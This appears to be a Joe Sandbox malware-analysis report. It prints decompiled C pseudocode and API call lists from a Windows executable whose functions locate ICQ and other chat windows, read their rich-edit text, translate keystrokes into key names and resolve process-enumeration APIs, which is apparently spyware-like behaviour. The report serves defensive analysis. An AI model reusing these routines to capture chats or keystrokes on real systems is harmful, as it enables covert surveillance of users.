    					__imp__#6( *((intOrPtr*)(_t64 - 0x10)), _t38,  *((intOrPtr*)(_t64 - 0x10)));
    				}
    				_push(_t64 + 0xc);
    				L0043DD3C();
    				 *((intOrPtr*)(_t64 - 0x1c)) = _t62;
    				 *((char*)(_t64 - 4)) = 0;
    				L0043DD36();
    				 *[fs:0x0] =  *((intOrPtr*)(_t64 - 0xc));
    				return  *((intOrPtr*)(_t64 + 8));
    			}

    APIs
    • __EH_prolog.LIBCMT ref: 00409552
      • Part of subcall function 0040FE29: FindWindowExA.USER32 ref: 0040FE43
    • FindWindowExA.USER32 ref: 0040957A
      • Part of subcall function 0040FEA7: __EH_prolog.LIBCMT ref: 0040FEAC
      • Part of subcall function 0040FEA7: IsWindow.USER32(?), ref: 0040FEC5
      • Part of subcall function 0040FEA7: SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 0040FEDC
      • Part of subcall function 0040FEA7: #823.MFC42(-000000C5), ref: 0040FEEA
      • Part of subcall function 0040FEA7: memset.MSVCRT ref: 0040FEF7
      • Part of subcall function 0040FEA7: SendMessageA.USER32(?,0000000D,-000000CA,?), ref: 0040FF0B
      • Part of subcall function 0040FEA7: #537.MFC42(?), ref: 0040FF13
      • Part of subcall function 0040FEA7: #825.MFC42(?,?), ref: 0040FF1F
      • Part of subcall function 0040FEA7: #535.MFC42(?,?), ref: 0040FF2C
      • Part of subcall function 0040FEA7: #800.MFC42(?,?), ref: 0040FF38
    • #923.MFC42(?,00000000,0000003E), ref: 00409599
    • #800.MFC42(?,00000000,0000003E), ref: 004095A5
      • Part of subcall function 00409643: __EH_prolog.LIBCMT ref: 00409648
      • Part of subcall function 00409643: #823.MFC42(0000000C,?,?,00429CB7,?,?), ref: 00409653
    • #539.MFC42(?,?,?,00000000,0000003E), ref: 004095EF
    • #858.MFC42(00000000,?,?,?,00000000,0000003E), ref: 004095FC
    • #800.MFC42(00000000,?,?,?,00000000,0000003E), ref: 00409608
    • SysFreeString.OLEAUT32(?), ref: 00409610
    • #535.MFC42(?,?,?,00000000,0000003E), ref: 0040961D
    • #800.MFC42(?,?,?,00000000,0000003E), ref: 0040962B
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #800$H_prologWindow$#535#823FindMessageSend$#537#539#825#858#923FreeStringmemset
    • String ID: Ate32Class$WndAte32Class
    • API String ID: 1302643171-1677065709
    • Opcode ID: d9b36a48d130591d4ea3f3a2c474b6e11e4af3cf41420fde571594f4e9d743c2
    • Instruction ID: bf27cd23291cbb31f4aaf92191929221c707622a68c4df41b4ffb47f979df033
    • Opcode Fuzzy Hash: d9b36a48d130591d4ea3f3a2c474b6e11e4af3cf41420fde571594f4e9d743c2
    • Instruction Fuzzy Hash: C8318D72D04149AEDB15EFA5D885AEEBB78EB14358F10842FF415A7282DA385E08CB64
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 75%
    			E0040A630() {
    				struct HWND__* _t20;
    				struct HWND__* _t21;
    				struct HWND__* _t26;
    				CHAR* _t39;
    				intOrPtr _t43;
    				void* _t45;
    
    				E0043E4E0(0x43fa93, _t45);
    				_t39 = "TPanel";
    				 *((intOrPtr*)(_t45 - 0x18)) = 0;
    				_t20 = FindWindowExA( *(_t45 + 0xc), 0, _t39, 0);
    				 *(_t45 - 0x14) = _t20;
    				if(_t20 != 0) {
    					_t21 = FindWindowExA(_t20, 0, "TRichView", 0);
    					if(_t21 != 0) {
    						L6:
    						_push(_t21);
    						_push(_t45 - 0x10);
    						E0040FEA7();
    						_t43 = 1;
    						_push(0x4550cc);
    						_push("\r\r");
    						 *((intOrPtr*)(_t45 - 4)) = _t43;
    						L0043E156();
    						_push(_t45 - 0x10);
    						L0043DD3C();
    						 *((intOrPtr*)(_t45 - 0x18)) = _t43;
    						 *((char*)(_t45 - 4)) = 0;
    						L0043DD36();
    					} else {
    						_t26 = FindWindowExA( *(_t45 + 0xc),  *(_t45 - 0x14), _t39, 0);
    						if(_t26 == 0) {
    							L5:
    							_push(0x4550cc);
    							L0043DE26();
    						} else {
    							_t21 = FindWindowExA(_t26, 0, "TRichView", 0);
    							if(_t21 != 0) {
    								goto L6;
    							} else {
    								goto L5;
    							}
    						}
    					}
    				} else {
    					_push(0x4550cc);
    					L0043DE26();
    				}
    				 *[fs:0x0] =  *((intOrPtr*)(_t45 - 0xc));
    				return  *((intOrPtr*)(_t45 + 8));
    			}

    Instruction address of each statement line above, in order: 0x0040a635, 0x0040a648, 0x0040a650, 0x0040a656, 0x0040a65a, 0x0040a65d, 0x0040a676, 0x0040a67a, 0x0040a6a7, 0x0040a6a7, 0x0040a6ab, 0x0040a6ac, 0x0040a6b8, 0x0040a6b9, 0x0040a6be, 0x0040a6c3, 0x0040a6c6, 0x0040a6d1, 0x0040a6d2, 0x0040a6da, 0x0040a6dd, 0x0040a6e0, 0x0040a67c, 0x0040a684, 0x0040a688, 0x0040a698, 0x0040a69b, 0x0040a6a0, 0x0040a68a, 0x0040a692, 0x0040a696, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x0040a696, 0x0040a688, 0x0040a65f, 0x0040a662, 0x0040a667, 0x0040a667, 0x0040a6ee, 0x0040a6f6

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: FindWindow$#537$H_prolog
    • String ID: TPanel$TRichView
    • API String ID: 43785774-1228822619
    • Opcode ID: 6334591ac2e13ce4c82cf13ed98ea833672b3853df58e0836613418795b6380a
    • Instruction ID: f4e50c7187afc8239c52be61a37fa561c6d9ca64e63d61990f1d6ebd13e33fad
    • Opcode Fuzzy Hash: 6334591ac2e13ce4c82cf13ed98ea833672b3853df58e0836613418795b6380a
    • Instruction Fuzzy Hash: 5D216571A00609BECB10EF91DC81DAFBB7CEB58759F10483FF514A7581D6395A0887A9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 62%
    			E0041F58A(signed int __ecx, void* __edi) {
    				void* __ebx;
    				void* __esi;
    				signed int _t26;
    				long _t30;
    				void* _t45;
    				void* _t46;
    				signed int _t48;
    				signed int _t49;
    				void* _t51;
    
    				_t46 = __edi;
    				E0043E4E0(0x441d88, _t51);
    				_t48 = __ecx;
    				_t30 = SendMessageA( *( *((intOrPtr*)(__ecx + 0x98)) + 0x20), 0x100c, 0xffffffff, 2);
    				if(_t30 == 0xffffffff) {
    					_t30 = 0;
    				}
    				L0043DDD8();
    				 *(_t51 - 4) =  *(_t51 - 4) & 0x00000000;
    				_push(_t51 - 0x10);
    				_push(0x42d);
    				L0043E2E2();
    				_push(0);
    				L00413FE9(_t51 - 0x10, _t30, _t51 - 0x70, _t45, _t48);
    				_push(_t48);
    				_push(0xba);
    				 *(_t51 - 4) = 1;
    				L0043E0BA();
    				_push(_t30);
    				_push(_t51 - 0x10);
    				_t26 = L0041D8CD(_t51 - 0x10, _t30, _t46, _t48);
    				if(_t26 != 0) {
    					L0043DEF2();
    					L0043E300();
    					_t49 = _t26;
    				} else {
    					L0043DEF2();
    					_push(0xffffffff);
    					_push(0x10);
    					_push(0xe030);
    					L0043E2CA();
    					_push(GetParent( *(_t48 + 0x20)));
    					L0043DD9C();
    					_push(0);
    					L0043E3A8();
    					_t49 = _t48 | 0xffffffff;
    				}
    				 *(_t51 - 4) =  *(_t51 - 4) & 0x00000000;
    				L0043E04E();
    				 *(_t51 - 4) =  *(_t51 - 4) | 0xffffffff;
    				L0043DD36();
    				 *[fs:0x0] =  *((intOrPtr*)(_t51 - 0xc));
    				return _t49;
    			}

    Instruction address of each statement line above, in order: 0x0041f58a, 0x0041f58f, 0x0041f599, 0x0041f5b3, 0x0041f5b8, 0x0041f5ba, 0x0041f5ba, 0x0041f5bf, 0x0041f5c4, 0x0041f5cb, 0x0041f5cc, 0x0041f5d3, 0x0041f5d8, 0x0041f5dd, 0x0041f5e2, 0x0041f5e3, 0x0041f5eb, 0x0041f5ef, 0x0041f5f7, 0x0041f5f8, 0x0041f5f9, 0x0041f605, 0x0041f637, 0x0041f63e, 0x0041f643, 0x0041f607, 0x0041f607, 0x0041f60c, 0x0041f60e, 0x0041f610, 0x0041f615, 0x0041f623, 0x0041f624, 0x0041f629, 0x0041f62d, 0x0041f632, 0x0041f632, 0x0041f645, 0x0041f64c, 0x0041f651, 0x0041f658, 0x0041f664, 0x0041f66c

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #2446$#1199#2086#2646#2864#3097#5162#540#641#800H_prologMessageParentSend
    • String ID:
    • API String ID: 1983238032-0
    • Opcode ID: cb07e8e99dd1db96753badfd01fae25b36d3d500a1d16f3542bdea37493342e0
    • Instruction ID: ca67f9a5c951b91e0882bd7208b66c6f2bd628a912b65fa7c32d89b1cda89005
    • Opcode Fuzzy Hash: cb07e8e99dd1db96753badfd01fae25b36d3d500a1d16f3542bdea37493342e0
    • Instruction Fuzzy Hash: 1421C571A01224ABDB14F7F5CC46BEE7778AF08328F10062EF122A71D2DFB859058B59
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 94%
    			E0040E116(intOrPtr __ecx) {
    				intOrPtr* _t32;
    				intOrPtr _t34;
    				void* _t37;
    				void* _t38;
    				intOrPtr* _t40;
    				intOrPtr* _t41;
    				intOrPtr* _t42;
    				intOrPtr* _t52;
    				void* _t55;
    
    				E0043E4E0(0x4400db, _t55);
    				_push(__ecx);
    				_push(__ecx);
    				_t34 = __ecx;
    				 *((intOrPtr*)(_t55 - 0x14)) = __ecx;
    				 *((intOrPtr*)(__ecx)) = 0x446b68;
    				_t52 = __ecx + 0x64;
    				 *(_t55 - 4) = 5;
    				if(_t52 != 0 &&  *((intOrPtr*)(_t52 + 4)) != 0) {
    					L0043DD72();
    				}
    				_t37 = _t34 + 0x54;
    				if(_t37 != 0 &&  *((intOrPtr*)(_t37 + 4)) != 0) {
    					L0043DD72();
    				}
    				_t38 = _t34 + 0x5c;
    				if(_t38 != 0 &&  *((intOrPtr*)(_t38 + 4)) != 0) {
    					L0043DD72();
    				}
    				 *(_t55 - 4) = 4;
    				L0043DD36();
    				_t40 = _t52;
    				 *((intOrPtr*)(_t55 - 0x10)) = _t40;
    				 *_t40 = 0x445440;
    				 *(_t55 - 4) = 6;
    				L0043DD72();
    				_t41 = _t34 + 0x5c;
    				 *((intOrPtr*)( *((intOrPtr*)(_t55 - 0x10)))) = 0x44547c;
    				 *((intOrPtr*)(_t55 - 0x10)) = _t41;
    				 *_t41 = 0x445440;
    				 *(_t55 - 4) = 7;
    				L0043DD72();
    				_t42 = _t34 + 0x54;
    				 *((intOrPtr*)(_t55 - 0x10)) = _t42;
    				 *((intOrPtr*)( *((intOrPtr*)(_t55 - 0x10)))) = 0x44547c;
    				 *_t42 = 0x445440;
    				 *(_t55 - 4) = 8;
    				L0043DD72();
    				_t32 =  *((intOrPtr*)(_t55 - 0x10));
    				 *(_t55 - 4) =  *(_t55 - 4) & 0x00000000;
    				 *_t32 = 0x44547c;
    				L0043DD36();
    				 *(_t55 - 4) =  *(_t55 - 4) | 0xffffffff;
    				L0043DF70();
    				 *[fs:0x0] =  *((intOrPtr*)(_t55 - 0xc));
    				return _t32;
    			}

    Instruction address of each statement line above, in order: 0x0040e11b, 0x0040e120, 0x0040e121, 0x0040e123, 0x0040e127, 0x0040e12a, 0x0040e130, 0x0040e137, 0x0040e13e, 0x0040e147, 0x0040e147, 0x0040e14c, 0x0040e151, 0x0040e158, 0x0040e158, 0x0040e15d, 0x0040e162, 0x0040e169, 0x0040e169, 0x0040e171, 0x0040e175, 0x0040e17a, 0x0040e181, 0x0040e184, 0x0040e186, 0x0040e18a, 0x0040e197, 0x0040e19a, 0x0040e19c, 0x0040e19f, 0x0040e1a1, 0x0040e1a5, 0x0040e1ad, 0x0040e1b0, 0x0040e1b3, 0x0040e1b5, 0x0040e1b7, 0x0040e1bb, 0x0040e1c0, 0x0040e1c3, 0x0040e1ca, 0x0040e1cc, 0x0040e1d1, 0x0040e1d7, 0x0040e1e2, 0x0040e1ea

    APIs
    • __EH_prolog.LIBCMT ref: 0040E11B
    • #2414.MFC42(?,?,0044547C,?,?,0040D4CE,?,?,?,?,?,0040D3E2), ref: 0040E147
    • #2414.MFC42(?,?,0044547C,?,?,0040D4CE,?,?,?,?,?,0040D3E2), ref: 0040E158
    • #2414.MFC42(?,?,0044547C,?,?,0040D4CE,?,?,?,?,?,0040D3E2), ref: 0040E169
    • #800.MFC42(?,?,0044547C,?,?,0040D4CE,?,?,?,?,?,0040D3E2), ref: 0040E175
    • #2414.MFC42(?,?,0044547C,?,?,0040D4CE,?,?,?,?,?,0040D3E2), ref: 0040E18A
    • #2414.MFC42(?,?,0044547C,?,?,0040D4CE,?,?,?,?,?,0040D3E2), ref: 0040E1A5
    • #2414.MFC42(?,?,0044547C,?,?,0040D4CE,?,?,?,?,?,0040D3E2), ref: 0040E1BB
    • #800.MFC42(?,?,0044547C,?,?,0040D4CE,?,?,?,?,?,0040D3E2), ref: 0040E1CC
    • #795.MFC42(?,?,0044547C,?,?,0040D4CE,?,?,?,?,?,0040D3E2), ref: 0040E1D7
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #2414$#800$#795H_prolog
    • String ID: @TD$|TD
    • API String ID: 327448584-1054255851
    • Opcode ID: 230b27221330b09a70ab0ab03d735983661748d236a00f15ddf8403c995f5eaf
    • Instruction ID: 77227a77602e3a545daa45990097c19d7e20c6d63a073472985e9dedc9cd258c
    • Opcode Fuzzy Hash: 230b27221330b09a70ab0ab03d735983661748d236a00f15ddf8403c995f5eaf
    • Instruction Fuzzy Hash: B121B2B0D01650CBCB15EF5AD5812AEFBB0BF4A308F14459FE4056B392C7785B05CB99
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 84%
    			E0040912B(void* __ecx) {
    				signed int _t22;
    				void* _t24;
    				struct HWND__* _t25;
    				signed int _t27;
    				char _t29;
    				CHAR* _t41;
    				void* _t45;
    
    				E0043E4E0(0x43f760, _t45);
    				if( *(_t45 + 8) != 0) {
    					if(strncmp( *(_t45 + 0xc), "#32770", 6) != 0) {
    						goto L1;
    					} else {
    						_push( *(_t45 + 8));
    						_push(_t45 - 0x10);
    						_t24 = E0040FEA7();
    						_push("Message Session");
    						 *(_t45 - 4) = 0;
    						L0043DFD6();
    						if(_t24 != 0) {
    							L5:
    							 *((char*)(_t45 + 0xf)) = 0;
    						} else {
    							_t27 = FindWindowExA( *(_t45 + 8), 0, "Button", "ICQ");
    							asm("sbb al, al");
    							_t29 =  ~_t27 + 1;
    							 *((char*)(_t45 + 0xf)) = _t29;
    							 *((char*)(_t45 + 0xf)) = 1;
    							if(_t29 == 0) {
    								goto L5;
    							}
    						}
    						 *(_t45 - 4) =  *(_t45 - 4) | 0xffffffff;
    						L0043DD36();
    						if( *((intOrPtr*)(_t45 + 0xf)) != 0) {
    							goto L1;
    						} else {
    							_t41 = "RichEdit20A";
    							_t25 = FindWindowExA( *(_t45 + 8), 0, _t41, 0);
    							if(_t25 == 0) {
    								goto L1;
    							} else {
    								_t22 = FindWindowExA( *(_t45 + 8), _t25, _t41, 0) & 0xffffff00 | _t26 != 0x00000000;
    							}
    						}
    					}
    				} else {
    					L1:
    					_t22 = 0;
    				}
    				 *[fs:0x0] =  *((intOrPtr*)(_t45 - 0xc));
    				return _t22;
    			}

    Instruction address of each statement line above, in order: 0x00409130, 0x0040913e, 0x0040915c, 0x00000000, 0x0040915e, 0x0040915e, 0x00409164, 0x00409165, 0x0040916c, 0x00409173, 0x00409176, 0x00409183, 0x004091a4, 0x004091a4, 0x00409185, 0x00409193, 0x00409197, 0x00409199, 0x0040919b, 0x0040919e, 0x004091a2, 0x00000000, 0x00000000, 0x004091a2, 0x004091a7, 0x004091ae, 0x004091b6, 0x00000000, 0x004091b8, 0x004091b8, 0x004091c3, 0x004091c7, 0x00000000, 0x004091cd, 0x004091d7, 0x004091d7, 0x004091c7, 0x004091b6, 0x00409140, 0x00409140, 0x00409140, 0x00409140, 0x004091e0, 0x004091e8

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: FindWindow$#2764#800H_prologstrncmp
    • String ID: #32770$Button$ICQ$Message Session$RichEdit20A
    • API String ID: 3274652419-1580816384
    • Opcode ID: df3a118b4bf585344daec92f6391a6ffc5bc57e04ddc6eaa0f364a1d2bac83cb
    • Instruction ID: 5b2b01ec5e7f7adfb6ed64922fbbaf6d2810a451a537c5d0adcfe48377672826
    • Opcode Fuzzy Hash: df3a118b4bf585344daec92f6391a6ffc5bc57e04ddc6eaa0f364a1d2bac83cb
    • Instruction Fuzzy Hash: D111E731A01249FEEF119F61CC45EAF7B58EF55399F10803AF8056A1D2D3388E04D618
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 69%
    			E00420806(void* __ecx) {
    				long _t31;
    				int _t32;
    				void* _t35;
    				void* _t36;
    				void* _t47;
    				void* _t49;
    
    				E0043E4E0(0x441f2c, _t49);
    				_t47 = __ecx;
    				_t31 = MapVirtualKeyExA( *(_t49 + 8) & 0x000000ff, 0, GetKeyboardLayout(0)) << 0x00000010 | 0x00000001;
    				if( *(_t49 + 8) >= 0x21 &&  *(_t49 + 8) <= 0x2f) {
    					_t31 = _t31 | 0x01000000;
    				}
    				_t32 = GetKeyNameTextA(_t31, _t49 - 0x58, 0x40);
    				if(_t32 != 0) {
    					_push(_t49 - 0x58);
    					L0043DE26();
    					 *(_t49 - 4) =  *(_t49 - 4) & 0x00000000;
    					_push(_t49 - 0x10);
    					_t35 = _t49 - 0x14;
    					_push(0x5b);
    					_push(_t35);
    					L0043E348();
    					_push(0x5d);
    					_push(_t35);
    					_t36 = _t49 + 8;
    					 *(_t49 - 4) = 1;
    					_push(_t36);
    					L0043E14A();
    					_push(_t36);
    					 *(_t49 - 4) = 2;
    					L0043DFCA();
    					 *(_t49 - 4) = 1;
    					L0043DD36();
    					 *(_t49 - 4) =  *(_t49 - 4) & 0x00000000;
    					L0043DD36();
    					_t32 = E004207D4(_t47,  *((intOrPtr*)(_t49 - 0x10)));
    					 *(_t49 - 4) =  *(_t49 - 4) | 0xffffffff;
    					L0043DD36();
    				}
    				 *[fs:0x0] =  *((intOrPtr*)(_t49 - 0xc));
    				return _t32;
    			}

    Instruction address of each statement line above, in order: 0x0042080b, 0x00420814, 0x0042082f, 0x00420835, 0x0042083d, 0x0042083d, 0x00420849, 0x00420851, 0x00420859, 0x0042085a, 0x0042085f, 0x00420866, 0x00420867, 0x0042086a, 0x0042086c, 0x0042086d, 0x00420872, 0x00420874, 0x00420875, 0x00420878, 0x0042087c, 0x0042087d, 0x00420882, 0x00420886, 0x0042088a, 0x00420892, 0x00420896, 0x0042089b, 0x004208a2, 0x004208ac, 0x004208b1, 0x004208b8, 0x004208b8, 0x004208c1, 0x004208c9

    APIs
    • __EH_prolog.LIBCMT ref: 0042080B
    • GetKeyboardLayout.USER32 ref: 00420818
    • MapVirtualKeyExA.USER32(?,00000000,00000000), ref: 00420826
    • GetKeyNameTextA.USER32 ref: 00420849
    • #537.MFC42(?), ref: 0042085A
    • #925.MFC42(?,0000005B,?,?), ref: 0042086D
    • #923.MFC42(00000021,00000000,0000005D,?,0000005B,?,?), ref: 0042087D
    • #858.MFC42(00000000,00000021,00000000,0000005D,?,0000005B,?,?), ref: 0042088A
    • #800.MFC42(00000000,00000021,00000000,0000005D,?,0000005B,?,?), ref: 00420896
    • #800.MFC42(00000000,00000021,00000000,0000005D,?,0000005B,?,?), ref: 004208A2
    • #800.MFC42(?,00000000,00000021,00000000,0000005D,?,0000005B,?,?), ref: 004208B8
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #800$#537#858#923#925H_prologKeyboardLayoutNameTextVirtual
    • String ID: /
    • API String ID: 1013038102-2043925204
    • Opcode ID: a381b6b9d22a8fb6ad50094ef6fac45cc354a907be07a4e1c16cca15f7864a8e
    • Instruction ID: e91744a518f7e3501b3cb1d93298473eb43898da4bf943b5a7f6b99c42836973
    • Opcode Fuzzy Hash: a381b6b9d22a8fb6ad50094ef6fac45cc354a907be07a4e1c16cca15f7864a8e
    • Instruction Fuzzy Hash: C721C3B1D00259AAEF11EBE1C80ABEFBF78AF15344F14445EF511A21C2DB789704CB69
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00428827() {
    				_Unknown_base(*)()* _t7;
    				void* _t8;
    				struct HINSTANCE__* _t9;
    
    				_t9 = GetModuleHandleA("KERNEL32.DLL");
    				if(_t9 == 0) {
    					L7:
    					return 0;
    				} else {
    					 *0x455b8c = GetProcAddress(_t9, "CreateToolhelp32Snapshot");
    					 *0x455b90 = GetProcAddress(_t9, "Module32First");
    					 *0x455b94 = GetProcAddress(_t9, "Module32Next");
    					 *0x455b98 = GetProcAddress(_t9, "Process32First");
    					_t7 = GetProcAddress(_t9, "Process32Next");
    					 *0x455b9c = _t7;
    					if( *0x455b90 == 0 ||  *0x455b94 == 0 ||  *0x455b98 == 0 || _t7 == 0 ||  *0x455b8c == 0) {
    						goto L7;
    					} else {
    						_t8 = 1;
    						return _t8;
    					}
    				}
    			}

    Instruction address of each statement line above, in order: 0x00428833, 0x00428837, 0x004288af, 0x004288b2, 0x00428839, 0x0042884e, 0x0042885b, 0x00428868, 0x00428875, 0x0042887a, 0x00428883, 0x00428889, 0x00000000, 0x004288aa, 0x004288ac, 0x004288ae, 0x004288ae, 0x00428889

    APIs
    • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,0041FE59), ref: 0042882D
    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00428846
